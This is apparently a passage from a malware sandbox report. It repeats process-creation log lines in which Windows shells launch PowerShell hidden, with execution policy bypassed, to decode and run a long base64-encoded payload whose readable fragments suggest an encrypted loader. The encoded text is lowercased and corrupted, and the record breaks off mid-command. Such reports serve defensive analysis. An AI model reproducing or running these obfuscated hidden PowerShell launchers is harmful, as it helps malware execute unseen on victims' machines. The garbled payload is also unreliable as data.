ylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command 